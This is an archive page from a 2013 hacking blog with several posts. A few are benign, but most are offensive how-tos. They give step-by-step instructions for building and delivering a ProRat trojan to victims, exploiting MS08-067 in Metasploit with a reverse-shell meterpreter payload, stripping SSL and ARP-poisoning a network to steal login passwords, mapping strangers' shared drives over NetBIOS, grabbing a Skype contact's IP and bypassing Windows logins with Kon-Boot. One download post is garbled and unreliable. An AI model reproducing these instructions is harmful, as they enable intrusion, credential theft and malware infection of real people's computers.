Showing posts with label windows hacking. Show all posts
Showing posts with label windows hacking. Show all posts

Tuesday, 3 December 2013

where to begin with hacking ? [how-to]

"where to begin with hacking".
So here is my opinion about how they should get around starting.

There are three types of hackers:

White Hats:

The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.

Grey Hats:

The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.

Black Hats:

The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.

So where to start?

You should know the answer to these questions before you start your hacking career.


Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pen testing etc.)?
What is your end-goal?

You should meet these requirements to become a successful hacker.

You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems works, and how to control them.


Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.


Website Hacking:

You properly already guessed it, but website hacking is about hacking websites. You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.


Pen testing and Forensics:

Pen testing and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.


Code exploiting:

Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.

Computer security:

The work these people do looks a lot like the pentesters. These people is able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.

You should now have an idea on where to start and in which direction you want to go. If you found any errors or typos feel free to contact me, and I will look into it. I will be updating this thread recently and add more details. I will soon add a dictionary, which explains the most basic hacking terms. I have putted a lot of effort in this tutorial and my goal with this tutorial is to give computer-interested people an idea of where they should start.

To the so-called “noobs”, who reads this:

I hope I have inspired you to begin at hacking. I hope that I have cleared things up a little bit, so it does not seem so messy anymore. If you have any questions or something you did not understand, I would gladly explain it to you again. Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker.

Sunday, 24 November 2013

How to Hide files inside a picture using Command Prompt - video



How to Hide files inside a picture using Command Prompt in windows easy way to hide files inside an image file (without any software)

First create a new folder in C:\ drive and name it anything i'm gonna name it "Hide"

Now move the files you want to hide and the picture in which you want to hide to the folder.

Select the files you want to hide and right click select "Add to archive..." and give the compressed file a name for example: Compressed.rar

Now open command prompt.
type cd\ to go to your root directory


Then type
copy /b yourimage.jpg+Compressed Files.rar xyz.jpg

your files will be hidden inside the image. To get your files back right click
on the image(xyz.jpg) and open it with Winrar you will see your files
you can extract the files anywhere you want on your computer.

Saturday, 26 October 2013

Windows XP Highly Compressed 10 MB Full Free Download




Windows XP ISO Free Download -Ghsoftwares.

Windows XP ISO Highly Compressed is a good window in all the windows. Every person like this window because it had a great future. Windows 8 ISO Highly Compressed is very beautiful in a graphic and his other features. Now in these days every person wants to install Windows 8 ISO Highly Compressed on his PC. It had a platform for all installed softwares on single window button. Windows XP ISO Highly Compressed is not easy to learn.
New Futures in Windows XP ISO Free Download

No.1 New Windows music.

No.2 In Windows 8 ISO ORB Images.

No.3 Now Windows 8 ISO Highly Compressed More Stable and Reliable.

No.4 UAC Disabled (You should be able to run Metro Applications without any problem).

No.5Windows Smart Screen Filter Disabled.

No.6 New Look for Windows Media Player.

No.7 New Windows 8 ISO Evolution Theme (Default).

No.8 Show extensions for known file types.

No.9 Enabled Glass Effect (DWM) without a supported card.

No.10 Windows will tell you exactly what it is doing when it is shutting down or is booting.

No.11 Add command prompt to right click context menu.

No.12 Enabled addition Avalon effects.

No.13 Added “Explore from here” context menu while right clicking on folders.

No.14 Get rid of the Windows Mail splash screen.

No.15 Maximum Simultaneous Downloads for Internet Explorer to 20 (Default was 2 ).

No.16 Enabled DirectX Video Acceleration in Windows Media Player.

No.17 Disabled Auto Rip disc when inserted in Windows Media Player.

No.18 Highly customized shell.

No.19 Enabled Auto Eject disc when ripping is completed.

No.20 Disabled deleting files from computer when deleted in library in Windows Media Player.

No.21Disabled Auto Add Played Media files.

No.22 Enabled Advanced Option in Monitor Folders in Windows Media Player.

No.23 Disabled deleting contents from devices when deleting playlist in Windows Media Player.

No.24 Enabled ClearType Tuning.

No.25 Added ‘Copy to Folder’ to right click context.

No.26 Added ‘Move to Folder’ to right click context.

No.26 Enabled Search in system folders.

No.27 Improved reliability and improved performance for gaming.

No.28 Disabled the NTFS Last Access Time Stamp (speeds up viewing folders in ntfs).

No.29 Disabled kernel paging.

No.30 Disabled kernel paging.

No.31 Disabled 8.3 names on NTFS.

No.32 Disabled Low disk space checks.

No.33 Faster Shutdown.

No.34 Fully Automated Windows Setup.

No.35 Added ‘Open With Notepad’ to right click context.

No.36 Disabled StickyKeys Keyboard shortcut (Popups up when pressing SHIFT key five times).

No.37 Disabled FilterKeys Keyboard shortcut (Popups up when pressing SHIFT key eight seconds).

No.38 Disabled ToggleKeys Keyboard shortcut (Popups up when pressing NUM LOCK No.1 key five seconds).

No.39 Disabled Windows Media Player AutoUpdates.

No.40 Disabled IPv6.

Windows 8 ISO Highly Compressed is a great by his futures.


Quick Heal detects virus that demands ransom of $ 300



 Best antivirus OF all the time read here

NEW DELHI: Cyber security firm Quick Heal today said it has detected a new computer virus, CryptoLocker ransomware, which after encrypting files in a user's computer demands a ransom of $ 300 (around Rs 18,500) for decrypting them.
Ramsomware, a kind of malicious software, is designed to block access to a computer until a certain sum of money is paid.

Generally, it targets individuals.
"In early September 2013, Quick Heal Threat Research and Response lab received several incidents about a malware that once executed encrypts files in the victim's computer and demands a certain ransom for decryption," Quick Heal said in a statement.

This malware makes a demand of $ 300 through prepaid card services like UKash, Bitcoin or MoneyPak, it added.

This type of malware is spread using social engineering tricks especially via email such as fake FedEx or UPS tracking notifications with attachments. Once the victim opens such email attachments, CryptoLocker gets installed and starts scanning the hard disk for all kinds of documents, it said.

Documents include images, videos, documents, spreadsheets and presentations, Quick Heal said adding the virus encrypts the files and once the user starts operating his/her system, it pops a message demanding a sum of $ 300 to buy a private key to decrypt the files, Quick Heal added.

"The malware gives a deadline of 100 hours to pay the ransom and get the private key to decrypt the data. If the amount is not paid it destroys the private key and your encrypted data is locked forever with no way to recover it," the firm said.

Hackers behind this malware are able to avoid the trace back by using digital cash systems like Bitcoins and MoneyPack where the payments can be anonymous.

"Since last couple of weeks we have been seeing over 500 incidents per day of this malware. The incidents are being reported from all over India," Quick Heal Chief Technical Officer Sanjay Katkar said.

The firm also said that cyber criminals are employing similar tactics to fleece money from the victims.
"Another similar kind of ransomware that goes by the name of 'Anti-Child Porn Spam' was seen infecting few computers in last couple of days. This shows that the trend for ransomware is growing," Quick Heal added.

Saturday, 10 August 2013

How to gain access to system account the most powerful account in Windows

How to gain access to system account the most powerful account in Windows.

not for windows 7 and vista or win 8 sorry :(

There is an account in Microsoft Windows that is more powerful than the Administrator account in Windows Operating Systems. That account is called System account it is similar to the root OR super user in the Linux/Unix world . I will show you how to access this system account in this article.
You can use this facility for removing programs that are causing problems to your system, malware etc.
Introduction

If you look at the task manager (which can be launched by pressing [CTRL]+[ALT]+[DEL]) you will see some processes that are running with System level privileges. Even the Administrator account is unable to do some of the things a system account can do.

System is the highest account in Windows (like root),You can be a super power user by accessing the system account (even while you are logged in as a restricted user)

Note: Accessing system account may cause serious problems.
Leave this tread and don’t follow the rest of this topic
if you don’t know what you are doing. I am not liable for any problems caused by accessing the system account

How to access System:

Note : Don’t follow the procedure bellow if you don’t know what you
are doing. You may harm your PC. If you follow, Do it on your own risk.
  1. Check the name of the account you’ve logged into (Click start. You
    will see the name of the account you’ve logged in.) 
  2. Launch the command prompt. (Start | Run | cmd | [Enter] )
    in command prompt, create a schedule to run cmd.exe.
    To create a schedule type the following line and hit enter.
    at 10:41 /interactive “cmd.exe”
    this will create a schedule to run cmd.exe at 10:41.
    (Since you are testing, check the time in your system try and add two or three minutes.)Change this time according to your local time
    Hint: you can check if the schedule is placed by typing “at
    and hitting enter after the above step.
  3. Wait for the time you set for the schedule.cmd.exe would be launched at the specified time.
  4. After cmd.exe is launched by the scheduled time, press [CTRL] + [ALT] + [DEL] and launch task manager.
    Select “Process” tab, select explorer.exe in the process list and click “End Process” button.
    You will receive a confirmation dialogue. Click “Yes” to end the process.
  5. Close task manager by clicking the close (X) button.
    Close the first cmd window (be careful to close the first one not the second one.
  6. Now you have only the second command prompt window and an empty desktop.
    In command prompt type the following line and hit “Enter”
    cd ..
  7. In command prompt type the following line and hit “Enter”explorer.exe
    If this is the first time you do it, windows creates the necessary
    components for you to access System ( Desktop, start menu,
    My document)
    when it’s finished you will have a new desktop.
  8. Close command prompt window. Click start and check your username.
    It’s changed to System.
    Now you are a super-power user. Be careful not to harm your PC and delete or modify system files if you don’t know what you are doing.

Friday, 2 August 2013

Decrease The Shutdown Time In Windows


Whenever you give the shutdown command in your Windows PC, it forwards the request to all the running services. It waits before it tells you if any of the service did not respond to the shutdown request (waits for 12 seconds in Windows 7 and 6 seconds in Windows 8). You can then force stop them or wait for them to respond. But if you have many services running, then 12 seconds for each service is much time to wait for.




So to decrease that time we have a simple trick that can decrease this time and hence decrease the shutdown time. The trick is simple, you just need to edit a registry entry that is responsible for the waiting time.
CAUTION You need to edit the registry, do this only if you have the knowledge of editing the Windows Registry.





How To Decrease the Shutdown Time in Windows :
1. Open the “Run” dialog box either from the “Start” menu, or by pressing the “Windows Key + R”, and then type “regedit” in the window that pops-up.


2. Now you need to navigate to “HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control”. Now when you click on “Control”, look in the right pane and find the key named “WaitToKillServiceTimeout“. Double click on it and change its value to 2000.

Friday, 24 May 2013

NetBIOS hack in windows OS

NetBIOS stands for Network Basic Input Output System. It allows your LAN or WAN to share drives, folders, files and printers. Gaining access to a computer through NetBIOS is very simple and easy. The only thing required is for the target machine to have file and printer sharing enabled and to have port 139 open. Below I will show you an example of what a hacker would do to gain access to a Windows machine through NetBIOS.


1. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner . Download and install it. (you can use any software you want to but i recommended this)
  
2. Next the hacker would insert the IP range he would like to scan. If the hacker was connected to a WLAN (Wireless Local Area Network) he would scan the local computers like I have shown below.


3. Since the hacker’s goal is to gain access to a system through NetBIOS, which runs on port 139, he will choose to scan each found host for that port. Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port. Click YES. 

4. Type in the port number 139 into the first box and click OK.

5. Click start. The program will begin scanning and when it’s complete a box with the results will come up.

6. As you can see 224 Ips were scanned. Out of those only one was alive and luckily it has port 139 open.
7. Open the Command Prompt by going to Start -> Run -> Type in cmd -> <ENTER> .

8. Now the hacker would run the “nbtstat –a TargetIPaddress” this will tell us if the target has file and printing enabled. Without it, this attack is not possible.

9. In the above image DAVIDS-MACHINE is the name of the target computer. If you look to the right of it you will see the number <20>. This means that file and printer sharing is enabled. If there was no <20> then you could not go any further and would have to find a new target.

10. Next the hacker would run the command “net view \\TargetIPaddress”. This command will display any shared drives, folders, files or printers. If nothing comes up, you won’t be able to gain access to anything since there is nothing being shared. In my case, I got the following:

11. In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk.

12. To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer. If successful, the hacker will have all the contents of my drive on his computer.

13. To map out my drive onto his computer the hacker would use the command “net use G: \\TargetIPaddress\DriveName”. So in my case I would run the command “net use G:\\192.168.1.101\SharedDocs”. You can use any letter in place of G:\\. This just tells the computer what to name the drive on your computer.

14. What’s this? Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter.

15. Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the targets documents



note: if you don't want to let this happen then  protect your shared folder and dont share printer and other device

Monday, 13 May 2013

How to configure/use ProRat Trojan to hack someone's PC (Free download and instructions)

How to configure/use ProRat Trojan to hack someone's PC (Free download and instructions) 

 

  • It can connect to the server more faster.
  • It has more features/functions to play with your victim's PC.
  • Easy to configure.
Lets start the Tutorial:
  • Download ProRat and extract anywhere in your PC.
  • Now run ProRat.exe and then click on Create- Create ProRat Server (342 Kbayt)


  • From the Notifications tab, in the first option "Use ProConnective Notification" type your IP address. (If you don't know your IP address, simply click on the red arrow and it will automatically fill your IP address).
  • Now in the second option "Use Mail Notifications" type your Email address where you want to receive notification when the server is installed on your victim's PC.

 

  • In the General Settings Tab, leave as it is but don't forget to remember the password. You will be required to enter the password at the time of connection. 
  • Now come to the Bind with File tab. Mark the box "Bind server with a file" and then click on Select File. Now select any file you want to bind with the server.(Binding means combining two files into one)
  • You can also change the extension of the server if you want by going to the Server Extensions tab.
  • Now click on Server Icon tab and select an icon for the bind files. Choose the icon wisely. If your have bind the server with some program, then select the setup icon or if your have bind the server with an image file, than select an image icon.
  • Finally click on Create Server.

Now the server will be created in your current directory (the extracted folder). Send or give the server to your victim and once your victim runs the bind file in his PC, the server will be installed silently on your victim's PC. After the server is installed on your victim's PC, the server will send you an email on your given email ID to confirm you that it's been installed successfully on the victim's PC. After getting the email, run ProRat again, then click onProConnective and then click on Start to list the ProConnective connections. After then, a new window will open which will show you weather your victim is online on not.

Tuesday, 7 May 2013

[Metasploit Tutorial] Hacking Windows XP using IP Addres

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.  video tut on this article soon...


Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:


  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


 Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.
 
We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

 Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.
 Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

notice remember this is only for educational purpose dont miss use it  its dangerous for you and for other learn it enjoy it do it ethically :) have fun  and yeha subscribe my channel www.youtube.com/way2hackintosh   

Tuesday, 23 April 2013

How To Hack Using Man In The Middle Attack | SSL Hacking

Hello hacker Friends this is one of the most common attack that most hacker do to amaze people and i am gonna make it simple for you all so that you can enjoy it and try to learn this is attack so are you all ready so lets start . every one know about http attack but this is SSL means https attack nice trick  so lets begin .. :D u can watch my video on youtube ;) 

Tools Needed:



  •  SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial



  •  Ettercap to carry out mitm attacks..

  • Steps to Perform MITM Attack

    1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok 


    2.Now select the victim’s IP and click open



    3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 




    4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


    5. Now select mitm-arp poisoning and click ok as shown 

     6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords 

    way2h security steps:-
    1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

    2. Always check the SSL certificate before doing an online transaction

    Stay Safe.Enjoy !!
    For Educational Purpose Only

    Monday, 18 March 2013

    How To Find An IP On Skype

    equirements -
    • Skype - Can be downloaded Here
    • CMD - Every computer has CMD (Start > All Programs > Accessories > Command Prompt)

    Step 1.

    [Image: skypedownload.png]

    Step 2.
    • Add the slave you wish to IP Grab.
     Step 3.
    • After adding the slave, Make sure your Skype is like this shown in the picture. 
     Step 4.
    • Double click the slave you wish to IP Grab.
     Step 5.
    • Go to Start > All Programs > Accessories > Right-click Command Prompt (CMD) & Run As Administrator. 
    Step 6.
    • Close unwanted applications that are open, Such as other opened Skype friends. Leave open the slave you wish to IP Grab.

    Step 7.
    • In CMD (Command Prompt) Type " netstat -nbt " (without the quotes)

    Step 8.
    • A whole bunch of stuff should come up. Find [Skype.exe]

    Step 9.
    • Now there will be more then one Skype.exe which is why you have to close the unwanted tabs of Skype. Now there should be 4 Not More IP's.

    Step 10.
    • All you have to do now is Track does 4 (Even less) IP's and one will occur to be the one your looking for.

    Hope this Tutorial is helpful, A Thanks would be appreciated.


    Thursday, 7 March 2013

    Bypass PC / Laptop password

    With this trick you can easily Hack all the PC/laptop when it isXP, VISTA & Windows 7

    Requirements:
    USB Flashdrive, KONUSB software

    Step 1:

    Download KONUSB software  
    (google it now you are not kid :P ) 


    Step 2:
    Plug in USB Flashdrive into the PC/laptop and double click
    on KONBOOTINSTALL.exe & enter the drive letter of the USB That’s it…

    Step 3:
    Now insert the Flashdrive into the PC/Laptop whichever u want to hack, and boot via USB (using Pend

    if it asks for password, leave blank and press OK

    NOTE:
    1. PC / Laptop must support USB Flashdrive Booting.

    2.This trick won’t change the Password of the PC / Laptop whatever you hacked..
    It just bypass the password restriction.. If u remove the USB Flashdrive,
    and boot normally it’ll remains the same as it is password protected.